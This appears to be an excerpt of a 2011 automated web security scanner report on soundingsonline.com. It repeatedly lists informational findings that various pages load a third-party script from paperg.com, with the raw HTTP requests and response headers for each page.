<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1276. http://www.soundingsonline.com/columns-blogs/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1277. http://www.soundingsonline.com/columns-blogs/new-england-fishing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1278. http://www.soundingsonline.com/columns-blogs/under-way previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1279. http://www.soundingsonline.com/component/chronocontact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1280. http://www.soundingsonline.com/component/content/article/237622 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

21.1281. http://www.soundingsonline.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

21.1282. http://www.soundingsonline.com/features previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1283. http://www.soundingsonline.com/features/destinations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/destinations

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1284. http://www.soundingsonline.com/features/in-depth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1285. http://www.soundingsonline.com/features/justyesterday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1286. http://www.soundingsonline.com/features/lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1287. http://www.soundingsonline.com/features/profiles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1288. http://www.soundingsonline.com/features/technical previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1289. http://www.soundingsonline.com/features/type-of-boat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1290. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

Response

21.1291. http://www.soundingsonline.com/more/digital-publications previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

21.1292. http://www.soundingsonline.com/more/the-masters-series previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

21.1293. http://www.soundingsonline.com/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1294. http://www.soundingsonline.com/news/coastwise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
